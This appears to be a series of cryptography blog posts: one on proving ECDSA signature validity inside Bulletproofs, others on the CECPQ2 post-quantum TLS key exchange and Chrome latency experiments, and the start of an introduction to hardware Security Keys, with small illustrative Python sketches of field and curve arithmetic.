The computational model for Bulletproofs is an arithmetic circuit: an acyclic graph where public and secret inputs enter and each node either adds or multiplies all its inputs. Augmenting that are linear constraints on the nodes of the circuit. In the tool that I wrote for generating these circuits, this is represented as a series of equations where the only operations are multiplication, addition, and subtraction. Here are some primitives that hopefully convince you that non-trivial functions can be built from this:
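As a minimal sketch of that idea, single-bit logic can be written using only multiplication, addition, and subtraction. The function names and the small prime modulus below are illustrative assumptions, not taken from the tool described in this post.

```python
# Toy prime modulus standing in for the circuit's field (an assumption made
# purely for illustration; the real field is far larger).
P = 2**61 - 1

def is_bit_constraint(x):
    # Evaluates to zero exactly when x is 0 or 1, since x*(x-1) = 0 in a field
    # forces x = 0 or x = 1. Costs one multiplication.
    return (x * x - x) % P

def bit_not(x):
    return (1 - x) % P

def bit_and(x, y):
    return (x * y) % P

def bit_or(x, y):
    return (x + y - x * y) % P

def bit_xor(x, y):
    return (x + y - 2 * x * y) % P

# Compare against Python's own bit operators for every pair of bits.
for a in (0, 1):
    for b in (0, 1):
        assert bit_and(a, b) == (a & b)
        assert bit_or(a, b) == (a | b)
        assert bit_xor(a, b) == (a ^ b)
```

Each of these costs at most one multiplication, provided that the inputs have already been constrained to be bits.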

PP-256

Using single bit values in an arithmetic circuit certainly works, but it's inefficient. Getting past single-bit values, the arithmetic circuits in Bulletproofs don't work in ℤ (i.e. arbitrary-length integers), rather they work over a finite field. Bulletproofs are built on top of an elliptic curve and the finite field of the arithmetic circuit is the scalar field of that curve.

When dealing with elliptic curves (as used in cryptography) there are two finite fields in play: the x and y coordinates of the points on the curve are in the coordinate field of the curve. Multiples of the base point (B) then generate a prime number (n) of points in the group before cycling back to the base point. So xB + yB = (x + y mod n)B — i.e. you can reduce the multiple mod n before multiplying because it'll give the same result. Since n is prime, reduction mod n gives a field, the scalar field.

(I'm omitting powers of primes, cofactors, and some other complications in the above, but it'll serve.)
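To make the two fields concrete, here is a small sketch on a textbook toy curve, y² = x³ + 2x + 2 over GF(17), whose base point (5, 1) generates a group of 19 points. The curve and all the names are assumptions chosen for illustration and have nothing to do with P-256 beyond sharing the same structure: coordinates live mod 17, multiples of the base point live mod 19.

```python
Q = 17       # coordinate field: x and y are reduced mod Q
A = 2        # the curve is y^2 = x^3 + A*x + 2
N = 19       # scalar field: multiples of the base point are reduced mod N
B = (5, 1)   # base point

def add(p1, p2):
    """Add two points; None represents the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % Q == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1 % Q, -1, Q) % Q
    else:
        lam = (y2 - y1) * pow((x2 - x1) % Q, -1, Q) % Q
    x3 = (lam * lam - x1 - x2) % Q
    return (x3, (lam * (x1 - x3) - y1) % Q)

def mul(k, pt):
    """Naive scalar multiplication by repeated addition (no reduction of k)."""
    result = None
    for _ in range(k):
        result = add(result, pt)
    return result

# xB + yB equals ((x + y) mod N)B for every pair of small multiples.
for x in range(25):
    for y in range(25):
        assert add(mul(x, B), mul(y, B)) == mul((x + y) % N, B)
```

Note that `mul` never reduces its scalar, so the loop really is checking that the multiples cycle with period 19 rather than assuming it.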

So Bulletproofs work in the scalar field of whatever elliptic curve they're implemented with, but we want to build P-256 ECDSA verification inside of a Bulletproof, and that involves lots of operations in P-256's coordinate field. So, ideally, the Bulletproofs need to work on a curve whose scalar field is equal to P-256's coordinate field. Usually when generating a curve, one picks the coordinate field to be computationally convenient, iterates other parameters until the curve meets standard security properties, and the scalar field is whatever it ends up as. However, after some quality time with “Constructing elliptic curves of prime order” (Broker & Stevenhagen) and Sage, we find that y² = x³ - 3x + B over GF(PP) where:

… gives a curve with the correct number of points, and which seems plausibly secure based on the SafeCurves criteria. (A more exhaustive check would be needed before using it for real, but it'll do for a holiday exploration.) Given its relationship to P-256, I called it “PP-256” in the code.

ECDSA verification

Reviewing the ECDSA verification algorithm, the public keys and message hash are obviously public inputs. The r and s values that make up the signature cannot both be public because then the verifier could just try each public key and find which one generated the signature. However, one of r and s can be public. From the generation algorithm, r is the x-coordinate of a random point and s is blinded by the inverse of the nonce. So on their own, neither r nor s discloses any information and so either one can just be given to the verifier, moving work outside of the expensive zero-knowledge proof. (I'm not worrying about tokens trying to use a covert channel here but, if you do worry about that, see True2F.)

If we disclose s to the verifier directly then what's left inside the zero-knowledge proof is 1) selecting the public key; 2) checking that the secret r is in range; 3) u₂ = r/s mod n; 4) scalar-multiplication of the public key by u₂; 5) adding in the (now) public multiple of the base point; and 6) showing that the x-coordinate of the resulting point equals the original r, mod n.
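For reference, here is how steps 2 to 6 look as ordinary (non-zero-knowledge) ECDSA verification. This is only a sketch on a textbook toy curve (y² = x³ + 2x + 2 over GF(17), base point of order 19), which is an assumption made for illustration and is far too small to be secure. The helper names are hypothetical.

```python
Q, A, N, G = 17, 2, 19, (5, 1)   # toy parameters, not P-256

def add(p1, p2):
    """Add two points; None represents the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % Q == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1 % Q, -1, Q) % Q
    else:
        lam = (y2 - y1) * pow((x2 - x1) % Q, -1, Q) % Q
    x3 = (lam * lam - x1 - x2) % Q
    return (x3, (lam * (x1 - x3) - y1) % Q)

def mul(k, pt):
    """Double-and-add scalar multiplication."""
    result = None
    while k:
        if k & 1:
            result = add(result, pt)
        pt = add(pt, pt)
        k >>= 1
    return result

def sign(d, z, k):
    """Sign hash z with private key d and nonce k (fixed here for clarity)."""
    r = mul(k, G)[0] % N
    s = pow(k, -1, N) * (z + r * d) % N
    return r, s

def verify(pub, z, r, s):
    if not (0 < r < N and 0 < s < N):      # step 2: range check
        return False
    w = pow(s, -1, N)
    u1 = z * w % N                         # public once s is disclosed
    u2 = r * w % N                         # step 3: u2 = r/s mod n
    pt = add(mul(u1, G), mul(u2, pub))     # steps 4 and 5
    return pt is not None and pt[0] % N == r   # step 6

pub = mul(7, G)
r, s = sign(7, 10, 3)
assert verify(pub, 10, r, s)
```

With s and the message hash public, `u1` can be computed by the verifier directly, which is why only the terms involving r and the public key need to stay inside the proof.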

The public-key is a 4-tooth comb, which is a precomputed form that speeds up scalar multiplications. It consists of 30 values. The main measure that we want to minimise in the arithmetic circuit is the number of multiplications where both inputs are secret. When selecting from t possible public keys the prover supplies a secret t-bit vector where only one of the bits is set. The proof shows that each value is, indeed, either zero or one using IsBit (from above, at a cost of one multiply per bit), and that exactly one bit is set by requiring that the sum of the values equals one. Each of the 30t public-key values is multiplied by one of the bits and summed to select exactly one key.
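A minimal sketch of that selection step follows. The function name and the placeholder key values are hypothetical, and the constraints are modelled as plain Python checks rather than as circuit nodes.

```python
# P-256's coordinate field prime, which is the field the circuit works in.
P = 2**256 - 2**224 + 2**192 + 2**96 - 1

def select_key(keys, selector):
    """Pick one key from `keys` using a secret one-hot `selector` vector."""
    if len(keys) != len(selector):
        raise ValueError("one selector value is needed per key")
    for bit in selector:
        # IsBit: x*x - x must be zero, which holds only for 0 and 1.
        if (bit * bit - bit) % P != 0:
            raise ValueError("selector value is not a bit")
    if sum(selector) % P != 1:
        raise ValueError("exactly one selector bit must be set")
    width = len(keys[0])
    # Each public value is scaled by its key's selector bit and summed, so
    # only the chosen key's values survive.
    return [sum(bit * key[i] for bit, key in zip(selector, keys)) % P
            for i in range(width)]

# Four placeholder "combs" of 30 values each (made-up numbers).
keys = [[1000 * k + i for i in range(30)] for k in range(4)]
assert select_key(keys, [0, 0, 1, 0]) == keys[2]
```

Since the key values are public, multiplying them by a secret bit is a multiplication by a constant, so the only secret-by-secret multiplications here are the ones inside the IsBit checks.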

Rather than checking that the secret r is within [0, n-1], which would cost 512 multiplies, we just check that it's not equal to zero mod n. That's the important condition here since an out of range r is otherwise just an encoding error. Showing that a number is not zero mod n just involves showing that it's not equal to zero or n, as 2n is outside of the arithmetic circuit field. Proving a ≠ b is easy: the prover just provides an inverse for a - b (since zero doesn't have an inverse) and the proof shows that (a - b) × (a - b)⁻¹ = 1.
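The inequality trick can be sketched as follows, using the standard P-256 constants. The function names are hypothetical, and the split between "prover" and "proof" is modelled with ordinary function calls.

```python
# P-256 coordinate field prime (the circuit's field) and group order.
P = 2**256 - 2**224 + 2**192 + 2**96 - 1
N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551

def prove_not_equal(a, b):
    """Prover side: supply an inverse of a - b in the circuit's field.

    Raises ValueError when a == b mod P, because zero has no inverse.
    """
    return pow((a - b) % P, -1, P)

def check_not_equal(a, b, inverse):
    """Proof side: a single multiplication shows that a - b is non-zero."""
    return (a - b) * inverse % P == 1

def check_nonzero_mod_n(r, inv_zero, inv_n):
    # Only 0 and N need excluding, because 2N already exceeds P.
    return check_not_equal(r, 0, inv_zero) and check_not_equal(r, N, inv_n)

r = 123456789
assert check_nonzero_mod_n(r, prove_not_equal(r, 0), prove_not_equal(r, N))
```

A prover holding r = 0 or r = N simply cannot produce the required inverse, so no value they supply will satisfy the constraint.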

Calculating r/s mod n is the most complex part of the whole proof! Since the arithmetic circuit is working mod P-256's p, working mod n (which is the order of P-256, slightly less than p) is awkward. The prover gives a bit-wise breakdown of r; the proof does the multiplication as three words of 86, 86, and 84 bits; the prover supplies the values for the carry-chain (since bit-shifts aren't a native operation in the arithmetic circuit); the prover then gives the result in the form a×n + b, where b is a 256-bit number; and the proof does another multiplication and carry-chain to check that the results are equal. All for a total cost of 2152 multiplication nodes!
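The integer identity underneath that description can be sketched as below. This is a heavy simplification: it assumes limbs are taken from the low end, it treats 1/s mod n as a public value because s is public, and it recombines the limb products with ordinary big-integer arithmetic instead of a prover-supplied carry-chain. All names are hypothetical.

```python
P = 2**256 - 2**224 + 2**192 + 2**96 - 1
N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
WIDTHS = (86, 86, 84)     # limb sizes, low limb first (assumed ordering)
OFFSETS = (0, 86, 172)    # bit position of each limb

def to_limbs(x):
    """Split a 256-bit integer into words of 86, 86, and 84 bits."""
    limbs = []
    for width in WIDTHS:
        limbs.append(x & ((1 << width) - 1))
        x >>= width
    if x:
        raise ValueError("value does not fit in 256 bits")
    return limbs

def product_columns(x, y):
    """Schoolbook multiplication: sum limb products by bit offset."""
    columns = {}
    for x_off, x_limb in zip(OFFSETS, to_limbs(x)):
        for y_off, y_limb in zip(OFFSETS, to_limbs(y)):
            columns[x_off + y_off] = columns.get(x_off + y_off, 0) + x_limb * y_limb
    return columns

def check_division(r, s, a, b):
    """Check that r * (1/s mod N) equals a*N + b with b below 2^256."""
    w = pow(s, -1, N)
    columns = product_columns(r, w)
    # Every column stays far below P, so none of them wraps in the field.
    assert all(value < P for value in columns.values())
    product = sum(value << offset for offset, value in columns.items())
    return 0 <= b < 2**256 and product == a * N + b

r, s = N - 12345, 0xDEADBEEFCAFE
a, b = divmod(r * pow(s, -1, N), N)   # the prover's witness
assert check_division(r, s, a, b)
```

The point of the small limbs is visible in the assertion: a product of two 86-bit words is about 172 bits, so a few of them can be summed without ever reaching p.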

After that, the elliptic curve operation itself is pretty easy. Using the formulae from “Complete addition formulas for prime order elliptic curves” (Renes, Costello, and Batina) it takes 5365 multiplication nodes to do a 4-tooth comb scalar-mult with a secret scalar and a secret point. Then a final 17 multiplication nodes add in the public base-point multiple, supply the inverse to convert to affine form, and check that the resulting x-coordinate matches the original r value. The circuit does not reduce the x-coordinate mod n in order to save work: for P-256, that means that around one in 2¹²⁸ signatures may be incorrectly rejected, but that's below the noise floor of arithmetic errors in CPUs. Perhaps if this were to be used in the real world, that would be worth doing correctly, but I go back to work tomorrow so I'm out of time.

In total, the full circuit contains 7534 multiplication nodes, 2154 secret inputs, and 17 236 constraints.

(Pratyush Mishra points out that affine formulae would be more efficient than projective since inversion is cheap in this model. Oops!)

Implementation

My tool for generating the matrices that Bulletproofs operate on outputs 136KB of LZMA-compressed data for the circuit described above. In some contexts, that amount of binary size would be problematic, but it's not infeasible. There is also quite a lot of redundancy: the data includes instructions for propagating the secret inputs through the arithmetic circuit, but it also includes matrices from which that information could be derived.

The implementation is based on BoringSSL's generic-curve code. It doesn't even use Shamir's trick for multi-scalar multiplication of curve points, it doesn't use Montgomery form in a lot of places, and it doesn't use any of the optimisations described in the Bulletproofs paper. In short, the following timings are extremely pessimistic and should not be taken as any evidence about the efficiency of Bulletproofs. But, on a 4GHz Skylake, proving takes 18 seconds and verification takes 13 seconds. That's not really practical, but there is a lot of room for optimisation and for multiple cores to be used concurrently.

The proof is 70 450 bytes, dominated by the 2154 secret-input commitments. That's not very large by the standards of today's web pages. (And Dan Boneh points out that I should have used a vector commitment to the secret inputs, which would shrink the proof down to just a few hundred bytes.)

Intermediates and FIDO2

One important limitation of the above is that it only handles one level of signatures. U2F allows an intermediate certificate to be provided so that only less-frequently-updated roots need to be known a priori. With support for only a single level of signatures, manufacturers would have to publish their intermediates too. (But we already require that for the WebPKI.)

Another issue is that it doesn't work with the updated FIDO2 standard. While only a tiny fraction of Security Keys are FIDO2-based so far, that's likely to increase. With FIDO2, the model of the device is also included in the signed message, so the zero-knowledge proof would also have to show that a SHA-256 preimage has a certain structure. While Bulletproofs are quite efficient for implementing elliptic curves, a binary-based algorithm like SHA-256 is quite expensive: the Bulletproofs paper notes a SHA-256 circuit using 25 400 multiplications. There may be a good solution in combining different zero-knowledge systems based on “Efficient Zero-Knowledge Proof of Algebraic and Non-Algebraic Statements with Applications to Privacy Preserving Credentials” (Chase, Ganesh, Mohassel), but that'll have to be future work.

Happy new year.

CECPQ2

CECPQ1 was the experiment in post-quantum confidentiality that my colleague, Matt Braithwaite, and I ran in 2016. It's about time for CECPQ2.

I've previously written about the experiments in Chrome which led to the conclusion that structured lattices were likely the best area in which to look for a new key-exchange mechanism at the current time. Thanks to the NIST process we now have a great many candidates to choose from in that space. While this is obviously welcome, it also presents a problem: the fitness space of structured lattices looks quite flat so there's no obviously correct choice. Would you like keys to be products (RLWE) or quotients (NTRU; much slower key-gen, but subsequent operations are faster; older, more studied)? Do you want the ring to be NTT-friendly (fast multiplication, but more structure), or to have just a power-of-two modulus (easy reduction), or to have as little structure as possible? What noise profile and failure probability? Smart people can reasonably end up with different preferences.

This raises the question: why do CECPQ2 now at all? In some number of years NIST will eventually whittle down the field and write standards. Adrian Stanger of the NSA said at CRYPTO this year that the NSA is looking to publish post-quantum standards around 2024, based on NIST's output. (And even said that they would be pure-PQ algorithms, not combined with an elliptic-curve operation as a safeguard.) So if we wait five years things are likely to be a lot more settled.

Firstly, you might not be happy with the idea of waiting five years if you believe Michele Mosca's estimate of a one sixth chance of a large quantum computer in ten years. More practically, as we sail past the two year mark of trying to deploy TLS 1.3, another concern is that if we don't exercise this ability now we might find it extremely difficult to deploy any eventual design.

TLS 1.3 should have been straightforward to deploy because the TLS specs make accommodations for future changes. However, in practice, we had to run a series of large-scale experiments to measure what patterns of bytes would actually weave through all the bugs in the TLS ecosystem. TLS 1.3 now has several oddities in the wire-format that exist purely to confuse various network intermediaries into working. Even after that, we're still dealing with issues. Gallingly, because we delayed our server deployment in order to ease the client deployment, we're now having to work around bugs in TLS 1.3 client implementations that wouldn't have been able to get established had we quickly and fully enabled it.

The internet is very large and it's not getting any easier to steer. So it seems dangerous to assume that we can wait for a post-quantum standard and then deploy it. Any CECPQ2 is probably, in the long-term, destined to be replaced. But by starting the deployment now it can hopefully make that replacement viable by exercising things like larger TLS messages. Also, some practical experience might yield valuable lessons when it comes to choosing a standard. If the IETF had published the TLS 1.3 RFC before feedback from deployment, it would have been a divisive mess.

CECPQ2 Details

At the time of CECPQ1, the idea of running both a post-quantum and elliptic-curve primitive concurrently (to ensure that even if the post-quantum part was useless, at least the security wasn't worse than before) wasn't universally embraced. But we thought it important enough to highlight the idea in the name: combined elliptic-curve and post-quantum. It's a much more widely accepted idea now and still makes sense, and the best choice of elliptic-curve primitive hasn't changed, so CECPQ2 is still a combination with X25519.

As for the post-quantum part, it's based on the HRSS scheme of Hülsing, Rijneveld, Schanck, and Schwabe. This is an instantiation of NTRU, the patent for which has expired since we did CECPQ1. (The list of people who've had a hand in NTRU is quite long. See the Wikipedia page for a start.)

Last year Saito, Xagawa, and Yamakawa (SXY) published a derivative of HRSS with a tight, QROM-proof of CCA2 security from an assumption close to CPA security. It requires changes (that slow HRSS down a little), but HRSS+SXY is currently the basis of CECPQ2. Since HRSS+SXY no longer requires an XOF, SHAKE-128 has been replaced with SHA-256.

Having said that it's hard to choose in the structured lattice space, obviously HRSS is a choice and there were motivations behind it:

  1. CCA2-security is worthwhile, even though TLS can do without. CCA2 security roughly means that a private-key can be used multiple times. The step down is CPA security, where a private-key is only safe to use once. NewHope, used in CECPQ1, was only CPA secure and that worked for TLS since its confidentiality keys are ephemeral. But CPA vs CCA security is a subtle and dangerous distinction, and if we're going to invest in a post-quantum primitive, better it not be fragile.
  2. Avoiding decryption failures is attractive. Not because we're worried about unit tests failing (hardware errors set a noise floor for that anyway), but because the analysis of failure probabilities is complex. In the time since we picked HRSS, a paper has appeared chipping away at these failures. Eliminating them simplifies things.
  3. Schemes with a quotient-style key (like HRSS) will probably have faster encap/decap operations at the cost of much slower key-generation. Since there will be many uses outside TLS where keys can be reused, this is interesting as long as the key-generation speed is still reasonable for TLS.
  4. NTRU has a long history. In a space without a clear winner, that's a small positive.

CECPQ2 will be moving slowly: It depends on TLS 1.3 and, as mentioned, 1.3 is taking a while. The larger messages may take some time to deploy if we hit middlebox- or server-compatibility issues. Also the messages are currently too large to include in QUIC. But working through these problems now is a lot of the reason for doing CECPQ2: to ensure that post-quantum TLS remains feasible.

Lastly, I want to highlight that this only addresses confidentiality, not authenticity. Confidentiality is more pressing since it can be broken retrospectively, but it's also much easier to deal with in TLS because it's negotiated independently for every connection. Post-quantum authenticity will be entangled with the certificate and CA ecosystem and thus will be significantly more work.

Post-quantum confidentiality for TLS

In 2016, my colleague, Matt Braithwaite, ran an experiment in Google Chrome which integrated a post-quantum key-agreement primitive (NewHope) with a standard, elliptic-curve one (X25519). Since that time, the submissions for the 1st round of NIST’s post-quantum process have arrived. We thus wanted to consider which of the submissions, representing the new state of the art, would be most suitable for future work on post-quantum confidentiality in TLS.

A major change since the 2016 experiment is the transition from TLS 1.2 to TLS 1.3 (a nearly-final version of which is now enabled by default in Chrome). This impacts where in the TLS handshake the larger post-quantum messages appear:

In TLS 1.2, the client offers possible cipher suites in its initial flow, the server selects one and sends a public-key in its reply, then the client completes the key-agreement in its second flow. With TLS 1.3, the client offers several possible public-keys in its initial flow and the server completes one of them in its reply. Thus, in a TLS 1.3 world, the larger post-quantum keys will be sent to every TLS server, whether or not they’ll use it.

(There is a mechanism in TLS 1.3 for a client to advertise support for a key-agreement but not provide a public-key for it. In this case, if the server wishes to use that key-agreement, it replies with a special message to indicate that the client should try again and include a public-key because it’ll be accepted. However, this obviously adds an extra round-trip and we don’t want to penalise more secure options—at least not if we want them adopted. Therefore I’m assuming here that any post-quantum key agreement will be optimistically included in the initial message. For a diagram of how this might work with a post-quantum KEM, see figure one of the Kyber paper. Also I'm using the term “public-key” here in keeping with the KEM constructions of the post-quantum candidates. It's not quite the same as a Diffie-Hellman value, but it's close enough in this context.)

In order to evaluate the likely latency impact of a post-quantum key-exchange in TLS, Chrome was augmented with the ability to include a dummy, arbitrarily-sized extension in the TLS ClientHello. To be clear: this was not an implementation of any post-quantum primitive, it was just a fixed number of bytes of random noise that could be sized to simulate the bandwidth impact of different options. It was included for all versions of TLS because this experiment straddled the enabling of TLS 1.3.

Post quantum families

Based on submissions to NIST’s process, we grouped likely candidates into three “families” of algorithms, based on size: supersingular isogenies (SI), structured lattices (SL), and unstructured lattices (UL). Not all submissions fit into these families, of course: in some cases the public-key + ciphertext size was too large to be viable in the context of TLS, and others were based on problems that we were too unfamiliar with to be able to evaluate.

As with our 2016 experiment, we expect any post-quantum algorithm to be coupled with a traditional, elliptic-curve primitive so that, if the post-quantum component is later found to be flawed, confidentiality is still protected as well as it would otherwise have been.

This led to the following, rough sizes for evaluation:

  1. Supersingular isogenies (SI): 400 bytes
  2. Structured lattices (SL): 1 100 bytes
  3. Unstructured lattices (UL): 10 000 bytes

Incompatibilities with unstructured lattices

Before the experiment began, in order to establish some confidence that TLS connections wouldn’t break, the top 2 500 sites from the Alexa list were probed to see whether large handshakes caused problems. Unfortunately, the 10 000-byte extension caused 21 of these sites to fail, including common sites such as godaddy.com, linkedin.com, and python.org.

Oddly enough, reducing the size of the extension to 9 999 bytes reduced that number to eight, but linkedin.com was still included. These remaining eight sites seem to reject ClientHello messages larger than 3 970 bytes.

This indicated that widespread testing of a 10 000-byte extension was not viable. Thus the unstructured lattice configuration was replaced with a 3 300-byte “unstructured lattice stand-in” (ULS). This size was chosen to be about as large as we could reasonably test (although four sites still broke).

Phase One

In February 2018, a fraction of Chrome installs (Canary and Dev channels only) were configured to enable the dummy extension in one of four sizes, with the configuration randomly selected, per install, from:

  1. Control group: no extension sent
  2. Supersingular isogenies (SI): 400 bytes
  3. Structured lattices (SL): 1 100 bytes
  4. Unstructured lattice stand-in (ULS): 3 300 bytes

We measured TLS handshake latency at the 50th and 95th percentile, split out by mobile / non-mobile and by whether the handshake was a full or resumption handshake.

Given that we measured a stand-in for the UL case, we needed to extrapolate from that to an estimate for the UL latency. We modeled a linear cost of each additional byte in the handshake, 66 bytes of overhead per packet, and an MTU around 1 500 bytes. The number of packets for the UL case is the same for MTU values around 1 500, but the number of packets for the SL case is less certain: a session ticket could push the ClientHello message into two packets there. We chose to model the SL case as a single packet for the purposes of estimating the UL cost.

We also ignored the possibility that the client’s initial congestion window could impact the UL case. If that were to happen, a UL client would have to wait an additional round-trip, thus our UL estimates might be optimistic.

Despite the simplicity of the model, the control, SI, and SL points for the various configurations are reasonably co-linear under it and we draw the least-squares line out to 10 000 bytes to estimate the UL latency.

Additional latency over control group:

Configuration              SI       SL       UL (estimated)
Desktop, Full, Median      4.0%     6.4%     71.2%
Desktop, Full, 95%         4.7%     9.6%     117.0%
Desktop, Resume, Median    4.3%     12.5%    118.6%
Desktop, Resume, 95%       5.2%     17.7%    205.1%
Mobile, Full, Median       -0.2%    3.4%     34.3%
Mobile, Full, 95%          0.5%     7.2%     110.7%
Mobile, Resume, Median     0.6%     7.2%     66.7%
Mobile, Resume, 95%        4.2%     12.5%    149.5%

(The fact that one of the SI values came out implausibly negative should give some feeling for the accuracy of the results—i.e. the first decimal place is probably just noise, even at the median.)

As can be seen, the estimated latency overhead of unstructured lattices is notably large in TLS, even without including the effects of the initial congestion window. For this reason, we feel that UL primitives are probably not preferable for real-time TLS connections.

It is also important to note that, in a real deployment, the server would also have to return a message to the client. Therefore the transmission overhead, when connecting to a compatible server, would be doubled. This phase of the experiment did not take that into account at all. Which leads us to…

Phase Two

In the second phase of the experiment we wished to measure the effect of actually negotiating a post-quantum primitive, i.e. when both client and server send post-quantum messages. We again added random noise of various sizes to simulate the bandwidth costs of this. Cloudflare and Google servers were augmented to echo an equal amount of random noise back to clients that included it.

In this phase, latencies were only measured when the server echoed the random noise back so that the set of measured servers could be equal between control and experiment groups. This required that the control group send one byte of noise (rather than nothing).

Since unstructured lattices were not our focus after the phase one results, there were only three groups in phase two: one byte (control), 400 bytes (SI), and 1 100 bytes (SL).

Unlike phase one, we did not break the measurements out into resumption / full handshakes this time. We did that in phase one simply because that’s what Chrome measures by default. However, it raises the question of what fraction of handshakes resume, since that value is needed to correctly weight the two numbers. Thus, in phase two, we simply measured the overall latency, with resumption (or not) implicitly included.

Here are the latency results, this time in milliseconds in order to reason about CPU costs below:

Additional latency over control group (ms):

Configuration      SI      SL
Mobile, Median     3.5     9.6
Mobile, 95%        18.4    159.0
Desktop, Median    2.6     5.5
Desktop, 95%       19.2    136.9

So far we’ve only talked about families of algorithms but, to analyse these results, we have to be more specific. That’s easy in the case of supersingular isogenies (SI) because there is only one SI-based submission to NIST: SIKE.

For SIKEp503, the paper claims an encapsulation speed on a 3.4GHz Skylake of 16 619 kilocycles, or 4.9ms of work on a server. They also report on an assembly implementation for Aarch64, which makes a good example client. There the key generation + decapsulation time is 86 078 kilocycles, or 43ms on their 2GHz Cortex-A79.

On the other hand, structured lattices (SL) are much faster. There are several candidates here but most have comparable speed, and it’s under a 10th of a millisecond on modern Intel chips.

Therefore, if computation were included, the SI numbers above would have 48ms added to them. That happens to make SL clearly faster at the median, although it does not close the gap at the 95% level. (The SI key-generation could be amortised across connections, at the cost of code complexity and maybe some forward security. Amortising key-generation across 16 connections results in 28ms of computation per connection, which doesn’t affect the argument.)
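The conversion from the quoted cycle counts to milliseconds is simple arithmetic, sketched here with a hypothetical helper name:

```python
def kilocycles_to_ms(kilocycles, clock_ghz):
    """Convert a cost in kilocycles to milliseconds at the given clock speed."""
    cycles = kilocycles * 1_000
    seconds = cycles / (clock_ghz * 1e9)
    return seconds * 1_000

# Figures quoted above for SIKEp503.
server_ms = kilocycles_to_ms(16_619, 3.4)   # encapsulation on the Skylake
client_ms = kilocycles_to_ms(86_078, 2.0)   # key generation + decapsulation
total_ms = server_ms + client_ms

print(f"server {server_ms:.1f}ms, client {client_ms:.0f}ms, total {total_ms:.0f}ms")
```

This counts the server and client work as strictly sequential, which is how the 48ms figure arises.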

We had previously deployed CECPQ1 (X25519 + NewHope) in TLS, which should be comparable to SL measurements, and gotten quite different results: we found a 1ms increase at the median and only 20ms at 95%. (And CECPQ1 took roughly 1 900 bytes.)

On a purely technical level, CECPQ1 was based on TLS 1.2 and therefore increased the sizes of the server’s first flow and the client’s second flow. It’s possible that bytes in the client’s second flow are less expensive, but much more significantly, TLS 1.2 does not do a fresh key-agreement for a resumption handshake. Therefore all the successful resumptions had no overhead with CECPQ1, but with TLS 1.3, they would. Going back to historical Chrome statistics from the time of the CECPQ1 experiment, we estimate that about 50% of connections would have been resumptions, which closes the gap.

Additionally, there may be a significant difference in Chrome user populations between the experiments. CECPQ1 went to Chrome Stable (non-mobile only) while the post-quantum measurements here have been done on Dev and Canary channels. It is the case that, for all non-mobile TLS connections (completely unrelated to any post-quantum experiments), the population of Dev and Canary channel users see higher TLS latencies and the effect is larger than the SI or SL effect measured above. Thus the user population for these experiments might have had poorer internet connections than the population for CECPQ1, exaggerating the costs of extra handshake bytes.

Apart from CPU time, a second major consideration is that we are not comparing like with like. Our 400-byte figure for SI maps to a NIST “category one” strength, while 1 100 bytes for SL is roughly in line with “category three”. A comparable, “category one” SL primitive comes in at more like 800 bytes, while a “category three” SI is much slower.

(Although there is a recent paper suggesting that SIKEp503 might be more like category three after all. So maybe this point is moot, but such gyrations highlight that SI is a relatively new field of study.)

Lastly, and much more qualitatively, we have had many years of dealing with subtle bugs in elliptic-curve implementations. The desire for performance pushes for carefully-optimised implementations, but missed carries, or other range violations, are typically impossible for random tests to find. After many years, we are at the point where we are starting to use formally-synthesised code for elliptic-curve field operations but SI would take us deeper into the same territory, likely ensuring that the pattern of ECC bugs continues into the future. (As Hamburg says in his NIST submission, “some cryptographers were probably hoping never to see a carry chain again”.)

On the other hand, SL designs are much more like symmetric primitives, using small fields and bitwise operations. While it’s not impossible to botch, say, AES, my experience is that the defect rates in implementations of things like AES and SHA-256 are dramatically lower, and this is a strong argument for SL over SI. Combining post-quantum primitives with traditional ECC is a good defense against bugs, but we should still be reluctant to adopt potentially fragile constructs.

(Not all SL designs have this benefit, mind you. Hamburg, quoted above, uses ℤ/(2^3120 − 2^1560 − 1) in ThreeBears and lattice schemes for other primitives may need operations like discrete Gaussian sampling. But it holds for a number of SL-based KEMs.)

Thus the overall conclusion of these experiments is that post-quantum confidentiality in TLS should probably be based on structured lattices although there is still an open question around QUIC, for which exceeding a single packet is problematic and thus the larger size of SL is more significant.

Security Keys

Introduction

Predictions of, and calls for, the end of passwords have been ringing through the press for many years now. The first instance of this that Google can find is from Bill Gates in 2004, although I suspect it wasn’t the first.

None the less, the experience of most people is that passwords remain a central, albeit frustrating, feature of their online lives.

Security Keys are another attempt to address this problem, initially in the form of a second authentication factor but, in the future, potentially as a complete replacement. Security Keys have gotten more traction than many other attempts to solve this problem and this post exists to explain and, to some extent, advocate for them to a technical audience.

Very briefly, Security Keys are separate pieces of hardware capable of generating public/private key pairs and signing with them. By being separate, they can hopefully better protect those keys than a general purpose computer can, and they can be moved between devices to serve as a means of safely authorising multiple devices. Most current examples attach via USB, but NFC and Bluetooth devices also exist.

Contrasts with existing solutions

Security Keys are not the first attempt at solving the problems of passwords, but they do have different properties than many of the other solutions.

One common form of second factor authentication is TOTP/HOTP. This often takes the form of an app on the user’s phone (e.g. Google Authenticator) which produces codes that change every minute or so. It can also take the form of a token with an LCD display to show such codes (e.g. RSA SecurID).

These codes largely solve the problem of password reuse between sites as different sites have different seed values. Thus stealing the password (and/or seed) database from one site no longer compromises accounts at other sites, as is the case with passwords.

However, these codes are still phishable: the user may be tricked into entering their password and code on a fake site, which can promptly forward them to the real site and impersonate the user. The codes may also be socially engineered as they can be read over the phone etc by a confused user.

Another common form of second factor authentication is SMS-delivered codes. These share all the flaws of HOTP/TOTP and add concerns around the social engineering of phone companies to redirect messages and, in extreme cases, manipulation of the SS7 network.

Lastly, many security guides advocate for the use of password managers. These, if used correctly, can also solve the password reuse problem and significantly help with phishing, since passwords will not be auto-filled on the wrong site. Thus this is sound advice and, uniquely amongst the solutions discussed here, can be deployed unilaterally by users.

